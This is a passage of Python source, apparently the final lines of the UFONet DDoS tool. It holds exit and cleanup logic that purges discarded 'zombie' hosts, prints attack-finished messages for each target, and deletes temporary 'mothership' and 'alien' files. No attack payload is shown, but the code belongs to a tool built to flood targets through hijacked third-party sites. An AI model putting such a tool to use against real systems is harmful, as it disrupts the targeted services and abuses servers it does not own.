  4813. discarded.append(r)
  4814. print(" + [Info] [X-RPCs] "+r+" -> [Purged!]")
  4815. if self.num_discard_ucavs > 0:
  4816. for u in self.discard_ucavs:
  4817. discarded.append(u)
  4818. print(" + [Info] [UCAVs] "+u+" -> [Purged!]")
  4819. disc_zombies = self.discard_zombies(discarded) # discard zombies (remove from files)
  4820. if disc_zombies > 0 and disc_zombies < 2:
  4821. print("\n[Info] [AI] You have removed ["+str(disc_zombies)+"] unit! -> [OK!]\n")
  4822. elif disc_zombies > 1:
  4823. print("\n[Info] [AI] You have removed ["+str(disc_zombies)+"] units! -> [OK!]\n")
  4824. if not self.options.target_list:
  4825. print('-'*21+ "\n")
  4826. print("[AI] "+self.exit_msg+"\n")
  4827. if not self.options.web:
  4828. return
  4829. else:
  4830. if self.num_target_list > 0: # still more targets
  4831. print('-'*21+ "\n")
  4832. print("[Info] [AI] Attack against: "+str(target)+" -> [Finished!]\n")
  4833. return
  4834. else: # finish attack from multiple targets
  4835. print('-'*21+ "\n")
  4836. print("[Info] [AI] Attack against: "+str(target)+" -> [Finished!]")
  4837. print("\n"+ '='*21+ "\n")
  4838. print("[Info] [AI] All your battles have ended! -> [Exiting!]")
  4839. print("\n"+ '-'*21+ "\n")
  4840. print("[AI] "+self.exit_msg+"\n")
  4841. if not self.options.web:
  4842. return
  4843. else:
  4844. if num_real_zombies < 1: # not any 100% vulnerable zombie found
  4845. print("\n[Info] [AI] [Control] Not any 100% vulnerable zombie found! -> [Exiting!]\n")
  4846. if os.path.exists('mothership') == True:
  4847. os.remove('mothership') # remove mothership stream
  4848. if os.path.exists('alien') == True:
  4849. os.remove('alien') # remove random alien worker
  4850. if not options.web:
  4851. sys.exit(2) # exit
  4852. else:
  4853. return
  4854. else:
  4855. print("\n" + '='*21)
  4856. AI_reply = input("\n[AI] Do you prefer a 'fortune' cookie instead? (y/N)\n")
  4857. if AI_reply == "y" or AI_reply == "Y":
  4858. self.AI() # AI fortune cookie
  4859. print('-'*21+ "\n")
  4860. print("\n[AI] "+self.exit_msg+"\n")
  4861. if os.path.exists('mothership') == True:
  4862. os.remove('mothership') # remove mothership stream
  4863. if os.path.exists('alien') == True:
  4864. os.remove('alien') # remove random alien worker
  4865. if not options.web:
  4866. sys.exit(2) # exit
  4867. else:
  4868. return
  4869. else:
  4870. if not options.attackme:
  4871. print("\n[Info] [AI] "+target+" -> [Target looks OFFLINE!]")
  4872. else:
  4873. print("\n[Error] [AI] NAT is not working correctly! -> [Exiting!]")
  4874. print("\n" + '-'*21)
  4875. print("\n[AI] "+self.exit_msg+"\n")
  4876. if os.path.exists('mothership') == True:
  4877. os.remove('mothership') # remove mothership stream
  4878. if os.path.exists('alien') == True:
  4879. os.remove('alien') # remove random alien worker
  4880. return
  4881. if __name__ == "__main__":
  4882. app = UFONet()
  4883. options = app.create_options()
  4884. if options:
  4885. app.run()